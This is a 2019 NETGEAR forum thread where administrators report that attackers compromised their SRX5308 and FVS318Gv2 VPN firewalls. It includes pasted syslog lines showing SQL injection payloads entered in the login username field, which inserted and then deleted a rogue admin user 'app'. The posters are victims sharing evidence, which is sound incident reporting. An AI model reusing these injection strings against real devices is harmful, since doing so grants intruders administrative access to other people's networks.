NETGEAR is aware of a growing number of phone and online scams. To learn how to stay safe click here.

Forum Discussion

laxamar's avatar
laxamar
Aspirant
Sep 30, 2019

Successful hack of our SRX5308

Hi,

Our SRX5308 was successfully hackedon Sep 27th. They seem to have found a SQL password that keeps users in a an internal database and injected a new user 'app'. We had SYSLOG to another machine ,so we caught the successful attempt and steps:

I don't know how to prevent this attack later, as they seem to have a direct way to inject with a known DB password

 

Sep 27 16:19:34 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:34 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:37 SRX5308 LOGIN [System] SSL_INFO : Login Successful for geardomain user app(Admin) from host 45.77.35.64
Sep 27 16:19:37 SRX5308 LOGIN [System] SSL_INFO : Login Successful for geardomain user app(Admin) from host 45.77.35.64
Sep 27 16:19:43 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:46 SRX5308 LOGIN [System] SSL_INFO :user app is Logged-Out successfully from host 45.77.35.64
Sep 27 16:19:47 SRX5308 LOGIN [System] SSL_INFO : Login Successful for geardomain user app(Admin) from host 45.77.35.64
Sep 27 16:19:47 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';delete from USERDBUsers where UserName='app';'
Sep 27 16:19:51 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:53 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:55 SRX5308 LOGIN [System] SSL_INFO : Login Successful for geardomain user app(Admin) from host 45.77.35.64
Sep 27 16:19:58 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:59 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';delete from USERDBUsers where UserName='app';'
Sep 27 16:20:03 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:04 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:08 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:11 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:12 SRX5308 LOGIN [System] SSL_INFO : Login Successful for geardomain user app(Admin) from host 45.77.35.64
Sep 27 16:20:13 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:13 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:30 SRX5308 LOGIN [System] SSL_INFO :user app is Logged-Out successfully from host 45.77.35.64
Sep 27 16:20:31 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';delete from USERDBUsers where UserName='app';'

 

4 Replies

  • laxamar's avatar
    laxamar
    Aspirant
    Sep 30, 2019

    It seems like a very old school DB injection during log in. Seems that Netgear does not db_escape their user input. Gawd!

    • jec956613's avatar
      jec956613
      Tutor
      Oct 05, 2019

      These have been out of support for a little while now.  Sadly, Netgear hasnt' seen fit to really replace them properly yet, so some vulnerability was bound to crop up eventually.

      • tetrawest's avatar
        tetrawest
        Apprentice
        Oct 25, 2019

        This is the reason I upgraded my perfectly working Prosafe FVS336Gv3 VPN routers to the BR500, end of support and firmware upgrades. Sadly, the BR500 is not reliable. 

  • Ricque's avatar
    Ricque
    Tutor
    Dec 30, 2019

    Same exploit on my FVS318Gv2 running firmware 4.3.5-3. Same user "app" added via SQL insertion on the login/password form. Not clear if anything was taken. 

     

    [FVS318Gv2]Wed Nov 20 06:51:56 2019(GMT-0700) [FVS318Gv2][SSLVPN][SSLVPN] Administrator app is successfully added. Group: geardomain User TimeOut: 5

    [FVS318Gv2]Wed Nov 20 06:51:58 2019(GMT-0700) [FVS318Gv2][SSLVPN][SSLVPN] SSL_INFO : Login Successful for geardomain user app(Admin) from host 139.180.209.90

    [FVS318Gv2]Wed Nov 20 06:51:58 2019(GMT-0700) [FVS318Gv2][System][LOGIN] SSL_INFO : Login Successful for geardomain user app(Admin) from host 139.180.209.90

    [FVS318Gv2]Wed Nov 20 06:52:14 2019(GMT-0700) [FVS318Gv2][SSLVPN][SSLVPN] SSL_INFO :user app is Logged-Out successfully from host 139.180.209.90

    [FVS318Gv2]Wed Nov 20 06:52:14 2019(GMT-0700) [FVS318Gv2][System][LOGIN] SSL_INFO :user app is Logged-Out successfully from host 139.180.209.90

    [FVS318Gv2]Wed Nov 20 06:52:15 2019(GMT-0700) [FVS318Gv2][SSLVPN][SSLVPN] SSL_ERROR: Invalid Password for user myxxxx';delete from USERDBUsers where UserName='app';'

    [FVS318Gv2]Wed Nov 20 06:52:15 2019(GMT-0700) [FVS318Gv2][System][LOGIN] SSL_ERROR: Invalid Password for user myxxxx';delete from USERDBUsers where UserName='app';'

    [FVS318Gv2]Wed Nov 20 06:52:17 2019(GMT-0700) [FVS318Gv2][SSLVPN][SSLVPN] Deleted User app

NETGEAR Academy

Boost your skills with the Netgear Academy - Get trained, certified and stay ahead with the latest Netgear technology! 

Join Us!

ProSupport for Business

Comprehensive support plans for maximum network uptime and business peace of mind.

 

Learn More